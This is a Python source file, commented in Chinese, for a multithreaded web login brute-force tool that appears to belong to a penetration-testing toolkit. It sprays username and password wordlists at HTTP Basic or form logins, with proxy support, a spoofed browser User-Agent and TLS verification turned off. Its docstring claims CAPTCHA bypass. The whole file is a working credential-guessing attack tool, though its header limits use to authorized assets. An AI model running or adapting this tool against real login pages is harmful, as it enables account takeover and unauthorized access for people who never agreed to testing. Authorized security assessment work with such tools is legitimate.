#!/usr/bin/env python3 """ Web Brute Force Tool Web 暴力破解工具 支持: - HTTP Basic Auth - Form 登录 - 多线程破解 - 代理支持 - 验证码绕过 Usage: python3 web-brute.py -u "http://target.com/login" -U usernames.txt -P passwords.txt python3 web-brute.py -u "http://target.com/login" --user admin -P passwords.txt -d "username=^USER^&password=^PASS^" 授权边界: - 仅用于自有资产、测试环境或已明确授权的登录入口 - 对公网测试资产执行验证时,应先确认限速、告警和锁定策略 - 不面向无授权第三方网站或公共站点 """ import argparse import requests import time import threading from concurrent.futures import ThreadPoolExecutor, as_completed from typing import List, Dict, Tuple, Optional import re import sys from pathlib import Path SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts" if str(SCRIPTS_DIR) not in sys.path: sys.path.insert(0, str(SCRIPTS_DIR)) from tool_contract import ( # noqa: E402 add_common_args, emit_report, ensure_authorized, make_report, parse_headers, write_evidence, ) class Colors: RED = "\033[91m" GREEN = "\033[92m" YELLOW = "\033[93m" BLUE = "\033[94m" CYAN = "\033[96m" END = "\033[0m" BOLD = "\033[1m" class WebBruteForcer: def __init__(self, threads: int = 5, timeout: int = 10, delay: float = 0): self.threads = threads self.timeout = timeout self.delay = delay self.session = requests.Session() self.session.headers.update( { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } ) self.found = [] self.lock = threading.Lock() self.attempts = 0 self.start_time = None def print_result(self, level: str, msg: str): colors = { "INFO": Colors.BLUE, "SUCCESS": Colors.GREEN, "WARNING": Colors.YELLOW, "ERROR": Colors.RED, "VULN": Colors.RED + Colors.BOLD, "FOUND": Colors.GREEN + Colors.BOLD, } print(f"{colors.get(level, '')}[{level}]{Colors.END} {msg}") def load_wordlist(self, filepath: str) -> List[str]: """加载字典文件""" try: with open(filepath, "r", encoding="utf-8", errors="ignore") as f: return [ line.strip() for line in f if line.strip() and not line.startswith("#") ] except FileNotFoundError: self.print_result("ERROR", f"字典文件不存在: {filepath}") return [] def try_login( self, url: str, username: str, password: str, method: str = "POST", data_template: str = None, headers: Dict = None, cookies: Dict = None, success_pattern: str = None, fail_pattern: str = None, success_codes: List[int] = None, ) -> Tuple[bool, Dict]: """尝试登录""" self.attempts += 1 if data_template: data = data_template.replace("^USER^", username).replace("^PASS^", password) if "=" in data: post_data = {} for pair in data.split("&"): if "=" in pair: k, v = pair.split("=", 1) post_data[k] = v else: post_data = {"username": username, "password": password} else: post_data = {"username": username, "password": password} try: if method.upper() == "GET": resp = self.session.get( url, params=post_data, headers=headers, cookies=cookies, timeout=self.timeout, allow_redirects=True, verify=False, ) else: resp = self.session.post( url, data=post_data, headers=headers, cookies=cookies, timeout=self.timeout, allow_redirects=True, verify=False, ) result = { "status_code": resp.status_code, "response_length": len(resp.text), "url": resp.url, } if success_codes and resp.status_code in success_codes: return True, result if success_pattern and re.search(success_pattern, resp.text, re.IGNORECASE): return True, result if fail_pattern and re.search(fail_pattern, resp.text, re.IGNORECASE): return False, result if resp.status_code == 302 or "login" not in resp.url.lower(): if "error" not in resp.text.lower() and "fail" not in resp.text.lower(): if len(resp.text) > 1000: return True, result return False, result except Exception as e: return False, {"error": str(e)} def brute_force( self, url: str, usernames: List[str], passwords: List[str], method: str = "POST", data_template: str = None, success_pattern: str = None, fail_pattern: str = None, verbose: bool = True, ) -> List[Dict]: """暴力破解""" self.start_time = time.time() total = len(usernames) * len(passwords) self.print_result( "INFO", f"开始暴力破解: {len(usernames)} 用户 × {len(passwords)} 密码 = {total} 组合", ) with ThreadPoolExecutor(max_workers=self.threads) as executor: futures = {} for username in usernames: for password in passwords: future = executor.submit( self.try_login, url, username, password, method, data_template, None, None, success_pattern, fail_pattern, ) futures[future] = (username, password) if self.delay > 0: time.sleep(self.delay) for future in as_completed(futures): username, password = futures[future] success, result = future.result() if verbose and self.attempts % 100 == 0: elapsed = time.time() - self.start_time rate = self.attempts / elapsed if elapsed > 0 else 0 print( f"\r{Colors.CYAN}[*]{Colors.END} 进度: {self.attempts}/{total} ({rate:.1f}/s)", end="", flush=True, ) if success: with self.lock: found_item = { "username": username, "password": password, "result": result, } self.found.append(found_item) self.print_result("FOUND", f"成功! {username}:{password}") if self.delay > 0: time.sleep(self.delay) if verbose: print() return self.found def main(): parser = argparse.ArgumentParser(description="Web Brute Force Tool") parser.add_argument("-u", "--url", required=True, help="目标登录URL") parser.add_argument("-U", "--userlist", help="用户名字典文件") parser.add_argument("-P", "--passlist", help="密码字典文件") parser.add_argument("--user", help="单个用户名") parser.add_argument("--pass", dest="password", help="单个密码") parser.add_argument( "-m", "--method", default="POST", choices=["GET", "POST"], help="HTTP方法" ) parser.add_argument( "-d", "--data", help="POST数据模板 (使用 ^USER^ 和 ^PASS^ 占位符)" ) parser.add_argument("--success", help="成功匹配模式 (正则)") parser.add_argument("--fail", help="失败匹配模式 (正则)") parser.add_argument("-t", "--threads", type=int, default=5, help="线程数") parser.add_argument("--timeout", type=int, default=10, help="超时时间") parser.add_argument("--delay", type=float, default=0, help="请求延迟(秒)") parser.add_argument("-v", "--verbose", action="store_true", help="详细输出") add_common_args(parser) args = parser.parse_args() ensure_authorized(args, parser) requests.packages.urllib3.disable_warnings() bruteforcer = WebBruteForcer( threads=args.threads, timeout=args.timeout, delay=args.delay ) bruteforcer.session.headers.update(parse_headers(args.header)) if args.proxy: bruteforcer.session.proxies.update({"http": args.proxy, "https": args.proxy}) if args.format != "text": bruteforcer.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment] usernames = [] if args.userlist: usernames = bruteforcer.load_wordlist(args.userlist) elif args.user: usernames = [args.user] else: bruteforcer.print_result("ERROR", "请提供用户名 (--user 或 -U)") sys.exit(1) passwords = [] if args.passlist: passwords = bruteforcer.load_wordlist(args.passlist) elif args.password: passwords = [args.password] else: bruteforcer.print_result("ERROR", "请提供密码 (--pass 或 -P)") sys.exit(1) bruteforcer.print_result("INFO", f"目标: {args.url}") bruteforcer.print_result("INFO", f"用户数: {len(usernames)}") bruteforcer.print_result("INFO", f"密码数: {len(passwords)}") if args.data: bruteforcer.print_result("INFO", f"数据模板: {args.data}") results = bruteforcer.brute_force( url=args.url, usernames=usernames, passwords=passwords, method=args.method, data_template=args.data, success_pattern=args.success, fail_pattern=args.fail, verbose=args.verbose and args.format == "text", ) elapsed = time.time() - bruteforcer.start_time rate = bruteforcer.attempts / elapsed if elapsed > 0 else 0 evidence_refs = [] ref = write_evidence( args, "web-brute-results.json", {"results": results, "attempts": bruteforcer.attempts, "elapsed": elapsed, "rate": rate}, ) if ref: evidence_refs.append(ref) status = "verified" if results else "needs-review" severity = "high" if results else "medium" report = make_report( tool="web-brute", mode="credential-spray-lab", target=args.url, status=status, severity=severity, payload_or_probe={"results": results, "username_count": len(usernames), "password_count": len(passwords)}, request_summary={"method": args.method, "threads": args.threads, "delay": args.delay, "rate": rate}, evidence_refs=evidence_refs, destructive_risk="medium", args=args, ) text_lines = [ "=" * 60, "Web Brute Force Tool", "=" * 60, f"Target: {args.url}", f"Attempts: {bruteforcer.attempts}", f"Elapsed: {elapsed:.2f}s", f"Hits: {len(results)}", f"Status: {status}", ] emit_report(args, report, text_lines) if __name__ == "__main__": main()